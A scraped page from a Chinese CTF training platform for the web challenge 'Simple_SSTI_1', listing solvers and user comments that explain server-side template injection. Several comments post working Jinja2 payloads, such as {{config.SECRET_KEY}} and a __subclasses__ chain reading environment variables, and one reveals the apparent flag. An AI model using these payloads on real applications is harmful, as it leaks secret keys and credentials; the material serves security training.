Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28603
提 示:
描 述:
Simple_SSTI_1
评分(50)
解题动态
Thrize 攻破了该题 1小时前
20230302241 攻破了该题 2小时前
20230302332 攻破了该题 2小时前
莫泽明 攻破了该题 5小时前
凌晨两点半 攻破了该题 5小时前
覃允哥哥 攻破了该题 7小时前
coap012 攻破了该题 7小时前
黎悦依 攻破了该题 8小时前
834bug 攻破了该题 19小时前
木秀于林 攻破了该题 20小时前
05su 攻破了该题 1天前
YTT 攻破了该题 1天前
刘德龙 攻破了该题 1天前
陆鑫 攻破了该题 1天前
991265477 攻破了该题 1天前
覃晴韵 攻破了该题 1天前
HHHHYY 攻破了该题 1天前
杨节 攻破了该题 1天前
0622 攻破了该题 1天前
评论
何林凤 1天前
举报
flag{*****}
y1 8天前
举报
http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}
xshzgjshpy 28天前
举报
http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}
cfggfbfxdgbb 1月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}
LeoCHAn 4月前
举报
flag{********}
merrymu 6月前
举报
模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。 基本探测:输入{{2*2}},若返回4则存在漏洞。
HK1ng 9月前
举报
还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}
看writeup刷题 9月前
举报
咋SECRET_KEY还必须大写
Wang_Micro 1年前
举报
?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}
超爱西西鸭 1年前
举报
/?flag={{config.SECRET_KEY}}